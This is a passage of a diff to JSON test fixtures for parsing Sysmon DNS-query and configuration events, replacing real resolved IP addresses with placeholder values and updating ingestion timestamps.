ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3693,39 +3644,39 @@ "type": "CNAME" }, { - "data": "18.204.130.216", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.246.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "107.23.153.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.235.141.27", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.210.79.248", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.146.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.210.64.206", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.214.161.226", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3734,15 +3685,15 @@ } ], "resolved_ip": [ - "18.204.130.216", - "18.209.246.43", - "107.23.153.61", - "18.235.141.27", - "3.210.79.248", - "18.209.146.43", - "18.210.64.206", - "18.214.161.226", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, @@ -3759,22 +3710,15 @@ "protected-by.clarium.io" ], "ip": [ - "18.204.130.216", - "18.209.246.43", - "107.23.153.61", - "18.235.141.27", - "3.210.79.248", - "18.209.146.43", - "18.210.64.206", - "18.214.161.226", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741273900Z", + "ingested": "2021-12-09T13:50:23.456764900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3838,12 +3782,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { @@ -3859,13 +3803,13 @@ "pagead2.googlesyndication.com" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741282700Z", + "ingested": "2021-12-09T13:50:23.456770Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3929,12 +3873,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { @@ -3950,13 +3894,13 @@ "googleads.g.doubleclick.net" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741291200Z", + "ingested": "2021-12-09T13:50:23.456775800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -4024,47 +3968,47 @@ "type": "CNAME" }, { - "data": "52.22.184.73", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.30.174", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.213.70.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.158.57.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.6.39.34", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.0.113.251", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.213.8.28", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.215.246.105", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "52.22.184.73", - "54.152.30.174", - "3.213.70.197", - "54.158.57.141", - "52.6.39.34", - "52.0.113.251", - "3.213.8.28", - "3.215.246.105" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -4081,20 +4025,13 @@ "pixel.advertising.com" ], "ip": [ - "52.22.184.73", - "54.152.30.174", - "3.213.70.197", - "54.158.57.141", - "52.6.39.34", - "52.0.113.251", - "3.213.8.28", - "3.215.246.105" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741299800Z", + "ingested": "2021-12-09T13:50:23.456781500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -4166,15 +4103,15 @@ "type": "CNAME" }, { - "data": "54.210.214.197", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.202.202.147", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4182,16 +4119,16 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "54.210.214.197", - "52.202.202.147", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -4209,17 +4146,16 @@ "onevideosync.uplynk.com" ], "ip": [ - "54.210.214.197", - "52.202.202.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741308300Z", + "ingested": "2021-12-09T13:50:23.456787300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:54.210.214.197;::ffff:52.202.202.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029408600Z'/\u003e\u003cEventRecordID\u003e99\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.844\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eonevideosync.uplynk.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 uplynk.adaptv.advertising.com;type: 5 uplynk-geo.adap.tv;type: 5 uplynk-beacon-newvpc-1603485991.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -4267,7 +4203,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741316800Z", + "ingested": "2021-12-09T13:50:23.456793Z", "code": "16", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e16\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e16\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:37.933324000Z'/\u003e\u003cEventRecordID\u003e1\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4616' ThreadID='4724'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-3541430928-2051711210-1391384369-1001'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.933\u003c/Data\u003e\u003cData Name='Configuration'\u003eC:\\Users\\vagrant\\Downloads\\\"C:\\Users\\vagrant\\Downloads\\Sysmon.exe\" -i -n\u003c/Data\u003e\u003cData Name='ConfigurationFileHash'\u003e\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -4331,12 +4267,12 @@ "type": "CNAME" }, { - "data": "50.116.194.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "50.116.194.21" + "89.160.20.156" ] }, "network": { @@ -4352,13 +4288,13 @@ "ad.turn.com" ], "ip": [ - "50.116.194.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741325400Z", + "ingested": "2021-12-09T13:50:23.456798900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029416700Z'/\u003e\u003cEventRecordID\u003e100\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.turn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ad.turn.com.akadns.net;::ffff:50.116.194.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 